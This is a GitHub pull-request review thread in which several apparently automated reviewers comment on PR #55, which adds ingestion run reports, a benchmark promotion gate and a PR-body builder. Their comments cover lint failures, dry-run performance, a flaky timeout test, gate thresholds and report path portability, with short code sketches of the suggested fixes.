  When run_benchmark_gate=True, the gate result is patched into the report via a read → mutate → write cycle. An interruption between the read and write leaves the on-disk report in an inconsistent state. The same atomic-rename approach as above would help.
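The atomic-rename pattern mentioned in the last two suggestions can be sketched with a temporary file and os.replace. The helper name write_json_atomically is an assumption; it is not taken from run_report.py.

```python
import contextlib
import json
import os
import tempfile
from pathlib import Path


def write_json_atomically(path: Path, payload: dict) -> None:
    """Write JSON to a temp file in the target directory, then rename over `path`."""
    path.parent.mkdir(parents=True, exist_ok=True)
    # Same directory as the target, so the rename stays on one filesystem.
    fd, tmp_name = tempfile.mkstemp(dir=path.parent, prefix=path.name, suffix=".tmp")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as handle:
            json.dump(payload, handle, indent=2)
            handle.flush()
            os.fsync(handle.fileno())
        os.replace(tmp_name, path)  # readers see the old file or the new one
    except BaseException:
        with contextlib.suppress(FileNotFoundError):
            os.unlink(tmp_name)
        raise
```

Using the same helper for both the initial report and the gate-result update would cover the read, mutate, write cycle as well.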
✅ Looks Good
- benchmark_gate.py security posture: shlex.split + shell=False is exactly right for user-supplied benchmark commands. Fail-closed design on every error path is correct.
- describe_source_availability() semantic clarity: The three-way distinction (missing path / path exists but empty / extraction error) is exactly what #54 asked for, and much better than the previous silent extract_messages() call.
- Deduplication in build_dataset_from_external(): O(n) exact-match set on task_input; simple, correct, and placed at the right stage (after LLM scoring, not before).
- run_report.py SHA-256 hashing: Chunked reads (1MB blocks) are memory-safe for large artifacts.
- Mutation opt-in discipline: All remote-mutating operations (branch creation, push, gh pr create) are behind explicit --branch, --push, --open-pr flags. Default behavior is local and non-mutative. --dry-run remains fully non-mutative throughout.
- Test coverage: Roundtrip metadata, fail-closed gate behaviour, CLI exit codes, benchmark command failure, timeout behaviour, and Git non-mutation are all explicitly verified. 150/150 passing, 11 DSPy deprecation warnings (harmless).
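For readers unfamiliar with the chunked hashing noted in the list above, a sketch of the general technique follows. The function name and constant are assumptions for illustration; the actual implementation in run_report.py is not shown in this thread.

```python
import hashlib
from pathlib import Path

CHUNK_SIZE = 1024 * 1024  # 1 MB, the block size mentioned in the review


def sha256_of_file(path: Path, chunk_size: int = CHUNK_SIZE) -> str:
    """Hash a file without loading it into memory all at once."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        # iter() with a sentinel keeps calling read() until it returns b"".
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Peak memory stays near one chunk regardless of artifact size, which is the property the review calls memory-safe.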
Verdict: APPROVE — No critical issues. The PR delivers the auditable promotion slice as described in #54 and all safety properties hold. The warnings above are non-blocking; the suggestions are optional hardening.
jarrettj
left a comment
Code Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: 💬 Comment (2 warnings, 3 suggestions — nothing blocking, solid overall implementation)
⚠️ Warnings
- evolution/core/external_importers.py:690: describe_source_availability calls extract_messages() with no limit, performing a full extraction just to count candidates. For users with large Claude Code/Copilot histories this makes --dry-run unexpectedly expensive. Use extract_messages(limit=1) for the reachability check, then only do the full count when explicitly requested, or add a dedicated lightweight path_exists() check.
- tests/core/test_issue54_promotion.py:147: time.sleep(5) with a 1-second timeout is flaky on slow CI. Python interpreter startup alone can be 300–500 ms on a loaded runner, leaving barely 500 ms of actual sleep. Prefer python -c 'while True: pass' (tight CPU loop that starts instantly) or increase the sleep to 30s with a 3-second timeout.
💡 Suggestions
- evolution/core/external_importers.py:749: Dedup is keyed on task_input alone. Two sessions with the same question but different session_ids or sources will silently drop the second, reducing cross-source diversity. Deduping on (task_input, source) or (task_input, session_id) preserves more variety.
- evolution/core/external_importers.py (_importer_registry): The registry returns a bare 3-tuple (label, cls, path). A @dataclass ImporterEntry(label, cls, path) would be self-documenting and cheap to extend if a 4th field is needed later.
- evolution/core/pr_builder.py (build_pr_text): The test-plan section hardcodes python -m pytest tests/ -q. In uv/pipenv/conda environments the reviewer's copy-paste will fail. Adding "(or equivalent for your environment)" avoids friction.
✅ Looks Good
- shlex + shell=False for benchmark commands: correctly prevents shell injection.
- Fail-closed gate design: missing required fields fail rather than default to pass. The right choice for a promotion gate.
- --dry-run remains non-mutative: the safety contract from the PR description is honoured throughout.
- pr_builder.py remote mutation is fully opt-in: all three mutation flags are explicit; the if open_pr and not push guard catches misconfiguration early.
- Source metadata round-trips cleanly through EvalExample.to_dict() / from_dict(): backward compatible with existing JSONL files.
- SHA-256 hashes in the run report make artifact integrity verifiable after the fact.
- Secret filtering stays in place: no new code path bypasses _contains_secret.
- sort_keys=True throughout JSON output: deterministic serialisation, diff-friendly reports.
- stdout/stderr truncation in benchmark results ([-4000:]): prevents memory pressure from verbose benchmark commands.
- Test coverage is solid: gate pass/fail/missing-fields, CLI exit codes, timeout, pr_builder no-mutation guarantee all covered.
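The combination praised above (shlex parsing, no shell, a per-command timeout, fail-closed results, and tail truncation) might look roughly like the sketch below. run_benchmark_command and the result keys are hypothetical names, not taken from benchmark_gate.py.

```python
import shlex
import subprocess

MAX_CAPTURED_CHARS = 4000  # mirrors the [-4000:] truncation noted in the review


def run_benchmark_command(command: str, timeout_seconds: float) -> dict:
    """Run one command without a shell; every failure mode yields passed=False."""
    try:
        argv = shlex.split(command)  # raises ValueError on unbalanced quotes
        if not argv:
            raise ValueError("empty benchmark command")
        completed = subprocess.run(
            argv,
            shell=False,  # argv goes straight to the OS, no shell parsing
            capture_output=True,
            text=True,
            timeout=timeout_seconds,
        )
    except (ValueError, OSError, subprocess.TimeoutExpired) as exc:
        # Fail closed: parse errors, missing binaries, and timeouts all fail.
        return {"command": command, "passed": False, "error": f"{type(exc).__name__}: {exc}"}
    return {
        "command": command,
        "passed": completed.returncode == 0,
        "returncode": completed.returncode,
        # Keep only the tail of each stream so the stored result stays small.
        "stdout": completed.stdout[-MAX_CAPTURED_CHARS:],
        "stderr": completed.stderr[-MAX_CAPTURED_CHARS:],
    }
```

Note that shell=False removes the shell injection surface only; the command can still be any local binary, so the caller has to be trusted.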
Reviewed by Hermes Agent
statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0))
continue
try:
    candidate_count = len(importer_cls.extract_messages())
extract_messages() is called here with no limit to count candidates, triggering a full extraction of the entire history file. For a --dry-run availability check this is unexpectedly expensive on large histories. Consider extract_messages(limit=1) to verify reachability, counting fully only when explicitly requested — or split into a fast path_exists() check and a separate count-on-demand API.
deduped_examples = []
seen_inputs = set()
for ex in examples:
    if ex.task_input in seen_inputs:
💡 Suggestion: Dedup keyed on task_input alone silently drops examples that share the same question across different sessions or sources (e.g., two users who both asked 'review this PR' via Copilot and Claude Code). Deduping on (task_input, source) or (task_input, session_id) preserves cross-source diversity at zero extra cost.
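A sketch of the composite-key variant suggested in this comment follows. Example is a hypothetical stand-in for EvalExample with only the two fields needed here, and dedupe_examples is an illustrative name.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Example:  # hypothetical stand-in for EvalExample
    task_input: str
    source: str = ""


def dedupe_examples(examples, key=lambda ex: (ex.task_input, ex.source)):
    """Keep the first example seen for each key, preserving input order."""
    seen = set()
    kept = []
    for ex in examples:
        k = key(ex)
        if k in seen:
            continue
        seen.add(k)
        kept.append(ex)
    return kept
```

Passing key=lambda ex: ex.task_input reproduces the current behaviour, so the choice between the two policies becomes a one-argument change.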
main,
[
    "--report", str(report_path),
    "--benchmark-command", "python -c 'import time; time.sleep(5)'",
time.sleep(5) with a 1-second timeout leaves only 4 seconds of margin, but Python interpreter startup on a loaded CI runner can consume 300–800 ms, making this test intermittently flaky. Prefer python -c 'while True: pass' (tight CPU loop, no startup lag) or use time.sleep(30) with a 3-second timeout for a comfortable safety margin.
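Another option, raised in an earlier review of this PR, is to avoid spawning a process at all and have a mock raise subprocess.TimeoutExpired. The sketch below shows the idea against a hypothetical helper, command_timed_out; a real test would target the gate's own code path instead.

```python
import subprocess
from unittest import mock


def command_timed_out(argv, timeout_seconds):
    """Hypothetical helper: True when the command exceeds its timeout."""
    try:
        subprocess.run(argv, capture_output=True, timeout=timeout_seconds)
    except subprocess.TimeoutExpired:
        return True
    return False


def test_timeout_is_reported_without_spawning_a_process():
    expired = subprocess.TimeoutExpired(cmd=["benchmark"], timeout=1)
    # Patching subprocess.run makes the timeout deterministic: no interpreter
    # startup, no sleeping, and no dependence on CI runner load.
    with mock.patch("subprocess.run", side_effect=expired) as fake_run:
        assert command_timed_out(["benchmark"], timeout_seconds=1) is True
    fake_run.assert_called_once()
```

The trade-off is that the mocked test no longer proves that a real subprocess is actually killed; keeping one slower end-to-end test alongside it may still be worthwhile.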
jarrettj
left a comment
Hermes Agent Code Review — PR #55
Verdict: 💬 Comment (no critical blockers; 2 warnings, 1 suggestion)
All 11 new tests pass locally. The architecture is clean and the security posture is good. Three areas worth addressing in a follow-up.
⚠️ Warnings
- benchmark_gate.py:87: Zero-byte-baseline artifact growth is misleading
  max(1.0, baseline_size) guards division-by-zero but silently mis-computes growth when baseline_size == 0. A genuinely new 100-byte file gets growth = (100-0)/1.0 = 100 = 10,000%, which always fails the default 50% gate. Operators starting from a blank slate will be surprised. Consider special-casing baseline_size == 0 (either skip growth check or use a sentinel float like inf).
- external_importers.py:690: Full extraction just to count candidates
  describe_source_availability calls importer_cls.extract_messages() with no limit, triggering a complete disk read of potentially thousands of sessions purely to get len(). In dry-run mode this is the main user-visible wait. A limit= parameter (e.g. 10,000) or a lightweight count_messages() classmethod would keep dry-runs snappy.
💡 Suggestions
- pr_builder.py:87: git checkout -B silently clobbers an existing branch
  -B force-creates the branch regardless of whether it already exists. If the operator re-runs --branch evolve/demo after a partial push, the local branch tip is reset without warning. Prefer -b (fails fast if branch exists) or add a pre-flight git branch --list {branch} check.
✅ Looks Good
- Canonical _message() factory eliminates copy-paste schema drift across all three importers; clean refactor.
- Fail-closed gate: _REQUIRED_FIELDS pre-check runs before any threshold evaluation; missing data never silently passes.
- shell=False + shlex.split() for benchmark commands: no shell injection surface.
- Lazy imports inside the if write_report: block in evolve_skill.py, so promo-artifact deps don't load on every run.
- Deduplication by task_input in build_dataset_from_external is the right default for training data hygiene.
- All 11 new tests pass; coverage spans roundtrip, metadata propagation, gate pass/fail, CLI exit codes, timeout, and PR builder determinism.
Reviewed locally on branch pr-55. Tests: 11 passed, 11 DSPy deprecation warnings (pre-existing, upstream).
optimized_size = float(_get(report, "optimized.size_bytes"))
holdout_delta = float(_get(report, "scores.holdout_delta"))
constraints_passed = bool(_get(report, "constraints.all_passed"))
artifact_growth = (optimized_size - baseline_size) / max(1.0, baseline_size)
max(1.0, baseline_size) guards division-by-zero but produces a misleading growth figure when baseline_size == 0. A new 100-byte file computes growth as (100-0)/1.0 = 100 = +10,000%, always failing the default 50% gate. Consider special-casing zero-byte baselines (skip the check, or set growth to float('inf') and document why).
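One way to special-case the zero-byte baseline is sketched below. The function is a standalone illustration under stated assumptions, not the gate's code: it treats an empty baseline as having no meaningful ratio and leaves the policy decision to the caller.

```python
import math


def artifact_growth(baseline_size: float, optimized_size: float) -> float:
    """Relative size growth, with an explicit rule for an empty baseline."""
    if baseline_size < 0 or optimized_size < 0:
        raise ValueError("sizes must be non-negative")
    if baseline_size == 0:
        # Assumption: growth from nothing is undefined rather than 10,000%.
        # Report 0.0 when both sides are empty, otherwise infinity, so the
        # caller has to decide how a brand-new artifact is gated.
        return 0.0 if optimized_size == 0 else math.inf
    return (optimized_size - baseline_size) / baseline_size
```

A caller could then check math.isinf(growth) and either skip the growth threshold or fail with a message that names the empty baseline as the cause.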
statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0))
continue
try:
    candidate_count = len(importer_cls.extract_messages())
extract_messages() is called with no limit, performing a full disk scan of all sessions just to get a count. In large workspaces this dominates dry-run time. Consider a limit= kwarg (e.g. limit=10_000) or a cheap count_messages() classmethod to keep dry-runs sub-second.
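A capped count, as proposed here, only works if messages are produced lazily. The sketch below assumes a generator-based reader; iter_nonempty_lines and count_up_to are hypothetical helpers, and the real extract_messages signature is known only from the review text.

```python
from itertools import islice
from typing import Iterable, Iterator


def iter_nonempty_lines(path: str) -> Iterator[str]:
    """Yield non-blank lines one at a time instead of reading the whole file."""
    with open(path, encoding="utf-8") as handle:
        for line in handle:
            if line.strip():
                yield line


def count_up_to(items: Iterable, limit: int) -> int:
    """Count items, but stop consuming the iterable after `limit` of them."""
    return sum(1 for _ in islice(items, limit))
```

With this shape, count_up_to(iter_nonempty_lines(history_path), 10_000) reads at most the first 10,000 records, and a result equal to the limit can be displayed as "10,000+".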
raise click.ClickException("--open-pr requires --push")

if branch:
    _run_git(["checkout", "-B", branch])
💡 Suggestion: git checkout -B pr-55 force-creates the branch, silently clobbering it if it already exists and has diverged (e.g. after a partial push). Prefer -b to fail-fast on collision, or pre-check with git branch --list pr-55 and prompt the operator.
jarrettj
left a comment
Code Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: Request Changes — the implementation is solid and well-tested, but a handful of issues (one correctness concern, one silent double-extraction performance trap, unused imports flagged by ruff, and a missing .gitignore entry) should be addressed before merge.
Summary
This PR implements the first auditable promotion slice from #54: canonical source metadata on ingested examples, machine-readable run reports (run_report.py), a conservative benchmark gate (benchmark_gate.py), a local-first PR body builder (pr_builder.py), and wiring in evolve_skill.py. The design is conservative (fail-closed, dry-run safe, no remote mutation by default) and the test coverage is good (11 new tests, all 150 pass).
Critical
None.
Warnings (should be fixed before merge)
1. describe_source_availability does a full extract_messages() on every dry-run call (external_importers.py L690). For large session databases (Copilot can be 100 MB+ per the module docstring), this loads every message just to count candidates. Either pass a small limit= or add a separate lightweight count_messages() method. As-is this can silently make --dry-run extremely slow.
2. write_report=True default means every evolution run (including failed/non-improving ones) writes reports and diff sidecar files to reports/runs/ with no cleanup policy. The directory is not in .gitignore, so it will accumulate indefinitely and could be accidentally committed. Either add reports/runs/ to .gitignore or document the cleanup policy in the README. Relatedly, run reports store absolute path strings for baseline/optimized/diff — these will be meaningless on a different machine reviewing the report.
3. evaluate_report is called in evolve_skill.py with no threshold arguments (line 313), so min_holdout_delta defaults to 0.0. This means the gate passes even when the evolved skill shows zero improvement — which defeats much of its purpose. At minimum the gate should require min_holdout_delta > 0, or evolve_skill should expose --min-holdout-delta and thread it through.
4. Unused import sys in benchmark_gate.py (line 8) and unused imports Panel, get_hermes_agent_path, LLMJudge, FitnessScore in evolve_skill.py — flagged by ruff check. These are pre-existing for evolve_skill.py but sys in benchmark_gate.py is new with this PR.
Suggestions (non-blocking)
- run_report.py L52, default argument report_dir: Path = Path("reports/runs"): Python evaluates Path(...) once, when the function is defined (at import time). Because Path objects are immutable this won't cause the classic mutable-default bug, but it is still an unusual pattern for library functions. Consider using report_dir: Path | None = None and resolving the default inside the function body for clarity.
- pr_builder.py --open-pr does not pass --base or --head to gh pr create: The resulting PR will default to the repo's default branch as base. If the user is on a detached or unexpected branch this could open against the wrong target. Documenting the expectation or adding --base would harden this.
- describe_source_availability in external_importers.py is both the dry-run display path (CLI) and a callable function, but its output is only printed in the CLI path. The function is well-structured for reuse, but callers should be aware of the performance note in warning #1.
- No test for the write_report integration in evolve_skill.py: The new write_report block in evolve_skill.evolve() is only covered indirectly, through unit tests of the individual modules (run_report, benchmark_gate, pr_builder). An integration test that calls evolve() with a minimal mock would close this gap.
- _constraint_to_dict fallback dict(result) in run_report.py (line 28) is a silent catch-all: if ConstraintResult ever changes shape, this will silently produce unexpected output. A more explicit fallback or a type check would be safer.
Looks Good
- shlex.split + shell=False subprocess in benchmark_gate.py: correct shell injection prevention.
- capture_output=True, timeout=benchmark_timeout_seconds per command: correct.
- fail-closed on every missing required field before running numeric checks: correct gate ordering.
- --dry-run in evolve_skill.py returns before the report block: no accidental writes.
- Secret filtering happens before dataset persistence and is unchanged.
- EvalExample.from_dict correctly ignores unknown keys via __dataclass_fields__ filtering.
- Deduplication of examples by task_input is in the right place (after relevance scoring, before splitting).
- Test coverage for timeout, non-zero exit, missing fields, deterministic PR body, and metadata roundtrip is thorough.
jarrettj
left a comment
Code Review — feat: add ingestion reports and promotion gates
Overall verdict: Request Changes — the implementation is solid and the direction is correct, but there are ruff lint failures that need to be cleaned up before merge (the CI workflow checks both ruff check and ruff format).
Test suite
All 150 tests pass (11 new tests for this PR, 139 pre-existing). No regressions. DSPy deprecation warnings are pre-existing and unrelated to this PR.
Critical / Blocking
None — no correctness bugs or security issues found.
Warnings (must fix before merge — CI will fail)
1. ruff check failures (10 errors, all auto-fixable)
evolution/core/benchmark_gate.py:8 — F401: `sys` imported but unused
evolution/skills/evolve_skill.py:18 — F401: `rich.panel.Panel` imported but unused
evolution/skills/evolve_skill.py:21 — F401: `get_hermes_agent_path` imported but unused
evolution/skills/evolve_skill.py:24 — F401: `LLMJudge` imported but unused
evolution/skills/evolve_skill.py:24 — F401: `FitnessScore` imported but unused
evolution/skills/evolve_skill.py:78 — F541: f-string without placeholders (×5 instances)
Fix with: ruff check --fix evolution/ && ruff format evolution/ tests/
2. ruff format failures — all 8 changed files need reformatting. The CI workflow runs ruff format --check and will fail on the current diff.
Suggestions (non-blocking)
3. require_constraints not exposed in the CLI
evaluate_report() accepts require_constraints: bool = True but benchmark_gate.py main() has no corresponding --require-constraints/--no-require-constraints flag. Users cannot disable that gate from the CLI. Consider adding @click.option("--no-require-constraints", "require_constraints", is_flag=True, default=True) or document the intentional omission.
4. describe_source_availability eagerly runs full ingestion
describe_source_availability calls importer_cls.extract_messages() (reading potentially 100 MB+ Copilot session files) to count candidates. The old dry-run did the same thing, so this is no worse than before — but the function name implies a lightweight check. A future improvement would be a fast count_candidates() method that short-circuits after a configurable limit.
5. cost_estimate is never passed from evolve_skill.py
write_run_report accepts cost_estimate: Optional[dict] but evolve_skill.py never passes it, so the report always writes "cost_estimate": null. The --max-cost-increase gate then produces a failure message if that threshold is set. This is safe by design (fail-closed), but worth a comment or a follow-up issue.
6. _importer_registry() captures HISTORY_PATH at call time
The registry function reads ClaudeCodeImporter.HISTORY_PATH at the moment it is called. In tests this works correctly because patches are applied at the class level before calling the registry. Worth a note in the docstring that mocking must patch the class attribute, not a local variable.
7. Lazy imports inside if write_report: block
The three from evolution.core.X import Y statements inside the if write_report: block in evolve_skill.py are fine for import-time performance but make the dependency graph implicit. If these modules add heavy top-level dependencies later, the regression will be silent. Consider at minimum a module-level comment flagging the intentional lazy import.
Looks Good
- Security: shlex.split + shell=False subprocess in benchmark_gate.py is correct. Benchmark commands come from the CLI operator, not untrusted input, and the PR description correctly calls this out.
- Fail-closed design: Missing required fields, unreadable reports, and timed-out benchmarks all result in passed=False. This is the right default.
- Source metadata provenance: The _message() canonical schema and the EvalExample field additions are clean. The to_dict() sparse-write approach (only emit non-empty metadata fields) preserves backward compatibility with old JSONL files.
- build_pr_text is deterministic and non-mutating by default: The guard if dry_run or (not branch and not push and not open_pr) ensures the default invocation never touches git.
- Deduplication: The seen_inputs set-based dedup after LLM scoring is a sensible addition that prevents inflated example counts from repeated session history.
- Test coverage: Happy path, fail-closed, CLI exit codes, timeout behaviour, and dry-run non-mutation are all tested. The test_source_availability_distinguishes_missing_path_from_empty_available_source test is particularly well-targeted.
jarrettj
left a comment
Code Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: Request Changes — the implementation is solid and well-tested, but a handful of issues (one correctness concern, one silent double-extraction performance trap, unused imports flagged by ruff, and a missing .gitignore entry) should be addressed before merge.
Summary
This PR implements the first auditable promotion slice from #54: canonical source metadata on ingested examples, machine-readable run reports (run_report.py), a conservative benchmark gate (benchmark_gate.py), a local-first PR body builder (pr_builder.py), and wiring in evolve_skill.py. The design is conservative (fail-closed, dry-run safe, no remote mutation by default) and the test coverage is good (11 new tests, all 150 pass).
Warnings (should be fixed before merge)
1. describe_source_availability does a full extract_messages() on every dry-run call (external_importers.py L690). For large session databases (Copilot can be 100 MB+ per the module docstring), this loads every message just to count candidates. Either pass a small limit= or add a separate lightweight count_messages() method. As-is, --dry-run can silently be very slow.
2. write_report=True default means every run writes to reports/runs/ with no cleanup policy, and that directory is not in .gitignore so reports could be accidentally committed. Absolute path strings in the report (baseline.path, optimized.path, diff.path) will also be meaningless on a different reviewer's machine. Add reports/runs/ to .gitignore or document the policy.
3. evaluate_report in evolve_skill.py (line 313) is called with no threshold arguments, so min_holdout_delta defaults to 0.0. The benchmark gate passes even when the evolved skill shows zero improvement. Expose --min-holdout-delta in evolve_skill and thread it through, or change the default to something meaningful like 0.01.
4. Unused import sys in benchmark_gate.py (line 8) — flagged by ruff check. This is new in this PR (benchmark_gate.py is new). Run ruff check --fix to clean up.
Suggestions (non-blocking)
- run_report.py L52: report_dir: Path = Path("reports/runs") is evaluated at import time. Harmless since Path objects are immutable, but unusual for a library function. Consider Path | None = None resolved inside the body.
- pr_builder.py --open-pr does not pass --base to gh pr create, so the target branch is inferred from the repo default. Document this assumption or add --base.
- No integration test covering the write_report block in evolve_skill.evolve(); the new modules are unit-tested but the wiring is not.
- _constraint_to_dict fallback dict(result) in run_report.py is a silent catch-all that could produce unexpected output if ConstraintResult changes shape.
Looks Good
- shlex.split + shell=False subprocess in benchmark_gate.py — correct shell injection prevention
- capture_output=True, timeout=benchmark_timeout_seconds per command — correct
- fail-closed on every missing required field before numeric checks — correct gate ordering
- --dry-run returns before the report block — no accidental writes
- Secret filtering unchanged and occurs before persistence
- EvalExample.from_dict correctly ignores unknown keys
- Deduplication by task_input is in the right place (after LLM scoring, before splitting)
- Test coverage for timeout, non-zero exit, missing fields, deterministic PR body, and metadata roundtrip is thorough
jarrettj
left a comment
Code Review — feat: add ingestion reports and promotion gates
Overall verdict: Request Changes. The implementation is solid and the direction is correct, but there are ruff lint failures that need to be cleaned up before merge (the CI workflow checks both ruff check and ruff format).
Test suite
All 150 tests pass (11 new tests for this PR, 139 pre-existing). No regressions. DSPy deprecation warnings are pre-existing and unrelated to this PR.
Critical / Blocking
None — no correctness bugs or security issues found.
Warnings (must fix before merge — CI will fail)
1. ruff check failures (10 errors, all auto-fixable)
- evolution/core/benchmark_gate.py:8: F401: sys imported but unused
- evolution/skills/evolve_skill.py:18: F401: rich.panel.Panel imported but unused
- evolution/skills/evolve_skill.py:21: F401: get_hermes_agent_path imported but unused
- evolution/skills/evolve_skill.py:24: F401: LLMJudge imported but unused
- evolution/skills/evolve_skill.py:24: F401: FitnessScore imported but unused
- evolution/skills/evolve_skill.py:78,81,124,139,192: F541: f-strings without any placeholders (5 instances)
Fix with: ruff check --fix evolution/ && ruff format evolution/ tests/
2. ruff format failures — all 8 changed files need reformatting. The CI workflow runs ruff format --check and will fail on the current diff.
Suggestions (non-blocking)
3. require_constraints not exposed in the CLI
evaluate_report() accepts require_constraints: bool = True but benchmark_gate.py main() has no corresponding --require-constraints/--no-require-constraints flag. Users cannot disable that gate from the CLI without editing code. Consider adding the flag or documenting the intentional omission.
4. describe_source_availability eagerly runs full ingestion
The function calls importer_cls.extract_messages() (reading potentially 100 MB+ Copilot session files) to count candidates. The old dry-run did the same, so this is no worse than before — but the function name implies a lightweight check. A future improvement would be a fast count path that short-circuits after a configurable limit.
5. cost_estimate is never passed from evolve_skill.py
write_run_report accepts cost_estimate: Optional[dict] but evolve_skill.py never passes it, so every run report has "cost_estimate": null. This means --max-cost-increase will always produce a gate failure if set. Safe by design (fail-closed), but worth a comment or a follow-up issue.
6. Lazy imports inside if write_report: block
The three from evolution.core.X import Y statements inside the conditional in evolve_skill.py are fine for performance but make the dependency graph implicit. A module-level comment flagging the intentional lazy import would help future readers.
Looks Good
- Security: shlex.split + shell=False subprocess in benchmark_gate.py is correct. Benchmark commands come from the CLI operator, not untrusted input.
- Fail-closed design: Missing required fields, unreadable reports, and timed-out benchmarks all result in passed=False. Correct default.
- Source metadata provenance: The _message() canonical schema and EvalExample field additions are clean. Sparse write in to_dict() preserves backward compatibility with old JSONL files.
- build_pr_text is deterministic and non-mutating by default: The guard if dry_run or (not branch and not push and not open_pr) is safe.
- Deduplication: The seen_inputs set-based dedup after LLM scoring is a sensible addition.
- Test coverage: Happy path, fail-closed, CLI exit codes, timeout behaviour, and dry-run non-mutation are all covered. The test distinguishing missing-path from empty-available-source is well-targeted.
jarrettj
left a comment
Code review: see inline comments and summary comment for details.
import json
import shlex
import subprocess
import sys
Unused import: sys is imported but never used in this file. ruff check flags this. Remove it to keep the lint clean since this is a new file added in this PR.
console.print(f" Run report: {report_path}")

if run_benchmark_gate:
    gate_result = evaluate_report(report_path)
Gate threshold defaulting to 0.0: evaluate_report is called with no min_holdout_delta argument, so it defaults to 0.0. This means the benchmark gate passes even when the evolved skill shows zero improvement over baseline, which defeats much of the gate's purpose. Consider exposing a --min-holdout-delta flag in evolve_skill's CLI and threading it through here, or at minimum hardcode a non-zero default (e.g. 0.01) when called from the evolution pipeline.
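The effect of the comparison operator at a 0.0 threshold can be made concrete with a small sketch. holdout_gate is a hypothetical function; the actual comparison inside evaluate_report is not shown in this thread, so the non-strict branch below is an assumption based on the behaviour described in the comment.

```python
def holdout_gate(holdout_delta: float, min_holdout_delta: float = 0.0, strict: bool = True) -> bool:
    """Return True when the holdout improvement clears the threshold."""
    if strict:
        # Strict comparison: a delta exactly at the threshold does not pass,
        # so zero improvement fails even with the 0.0 default.
        return holdout_delta > min_holdout_delta
    # Non-strict comparison: zero improvement passes a 0.0 threshold.
    return holdout_delta >= min_holdout_delta
```

Either a strict comparison or a small positive default such as 0.01 closes the zero-improvement case; exposing the threshold on the CLI lets operators choose.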
Automated Code Review Summary (jarrettj review agent)
PR: feat: add ingestion reports and promotion gates
Test Results
Verdict: Request Changes
No security issues, no correctness bugs. The single blocker is CI-breaking lint.
Blocker (CI will fail)
Ruff lint and format failures across all 8 changed files. Fix with:
Specific issues:
Non-blocking Suggestions
Positive Notes
statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0))
continue
try:
    candidate_count = len(importer_cls.extract_messages())
Performance: full extraction on dry-run: describe_source_availability calls importer_cls.extract_messages() (no limit) just to count candidates. For Copilot sessions this can be 100 MB+ of JSONL per the class docstring. This makes --dry-run unexpectedly slow and does redundant work since build_dataset_from_external will call extract_messages() again afterwards. Consider passing limit=1000 (or similar small cap) here, or adding a dedicated lightweight count_messages() method.
import json
import shlex
import subprocess
import sys
F401: import sys is unused — this will fail CI (ruff check). Remove it.
"timestamp": timestamp,
"target": {"type": target_type, "name": target_name},
"baseline": {
    "path": str(baseline_path),
Absolute paths in report reduce portability: baseline.path, optimized.path, and diff.path store absolute local paths. When a reviewer on a different machine opens the report, these paths are meaningless. Consider storing relative paths from the report directory (e.g. Path(baseline_path).relative_to(report_dir)) or at least documenting that paths are machine-local.
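One caveat when implementing this: Path.relative_to raises ValueError unless the target sits underneath the base directory, and a baseline skill file will usually live outside reports/runs/. The sketch below uses os.path.relpath instead, which can walk upward with "..". portable_path is a hypothetical helper, and the example paths are made up.

```python
import os
from pathlib import Path


def portable_path(target: Path, report_dir: Path) -> str:
    """Express target relative to report_dir, using forward slashes."""
    # os.path.relpath is purely lexical and inserts ".." segments as needed,
    # so the target does not have to be inside report_dir.
    relative = os.path.relpath(target, start=report_dir)
    return Path(relative).as_posix()
```

On a POSIX system, a baseline at /repo/skills/demo/SKILL.md with reports in /repo/reports/runs would be stored as ../../skills/demo/SKILL.md, which stays valid wherever the repository is checked out.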
@click.option("--max-cost-increase", default=None, type=float)
@click.option("--benchmark-command", multiple=True, help="Optional benchmark command parsed with shlex; non-zero exit fails the gate")
@click.option("--benchmark-timeout-seconds", default=300, type=int, show_default=True, help="Per-command timeout for benchmark commands")
def main(report_path: Path, min_holdout_delta: float, max_artifact_growth: float, max_cost_increase: float | None, benchmark_command: tuple[str, ...], benchmark_timeout_seconds: int):
The require_constraints parameter in evaluate_report() has no corresponding CLI flag here. A user who wants to skip constraint gating from the command line cannot do so. Consider adding --no-require-constraints or document this as intentional.
    optimized_score=avg_evolved,
    elapsed_seconds=elapsed,
    report_dir=Path(report_dir),
)
cost_estimate is not passed here, so run reports always contain "cost_estimate": null. This means --max-cost-increase on the gate will always produce a failure ("missing required cost estimate for max cost increase gate"). Safe by design (fail-closed), but worth a comment or follow-up issue so the intent is clear.
Review Summary, PR #55: feat: add ingestion reports and promotion gates
Verdict: REQUEST_CHANGES
All 150 tests pass locally (including the 11 new tests added in this PR). Ruff found 4 unused imports (sys in benchmark_gate.py is new; others are pre-existing in evolve_skill.py).
What this PR does
Issues that need addressing before merge
Non-blocking suggestions
Looks good
jarrettj
left a comment
Code Review: feat: add ingestion reports and promotion gates (PR #55)
Reviewed by: Claude Sonnet 4.6 (automated review via API)
Review date: 2026-05-16
Files reviewed: 8 (3 new modules, 5 modified files, 2 new test files)
Lines: +615 / -46
Summary
This PR implements the first auditable promotion slice from issue #54. The implementation is well-structured, the safety posture is conservative, and the test coverage is thorough. The PR can be approved with the notes below.
CRITICAL
None.
WARNINGS
1. Unused import sys in benchmark_gate.py (line 8)
sys is imported but never used in benchmark_gate.py. The module uses raise SystemExit(1) (not sys.exit(1)), which doesn't require sys. This should be removed to avoid confusion and keep the import list clean.
2. Subprocess injection risk is mitigated but the attack surface note deserves documentation
benchmark_commands is parsed with shlex.split() and run without shell=True — this is correct. However, anyone who calls evaluate_report(report_path, benchmark_commands=[...]) programmatically rather than through the CLI could pass unsafe input. The function docstring should note that callers are responsible for sanitizing benchmark_commands before passing them in, since shlex.split only prevents shell metacharacter injection but does not prevent running arbitrary local binaries.
3. describe_source_availability calls importer_cls.extract_messages() with no limit
In external_importers.py, describe_source_availability() calls importer_cls.extract_messages() (no limit arg) on potentially very large history files just to count candidates. For a user with years of Copilot history this could be slow and memory-hungry in a dry-run context. Consider passing limit=1000 or streaming a count instead.
4. run_report.py stores absolute paths in the report JSON
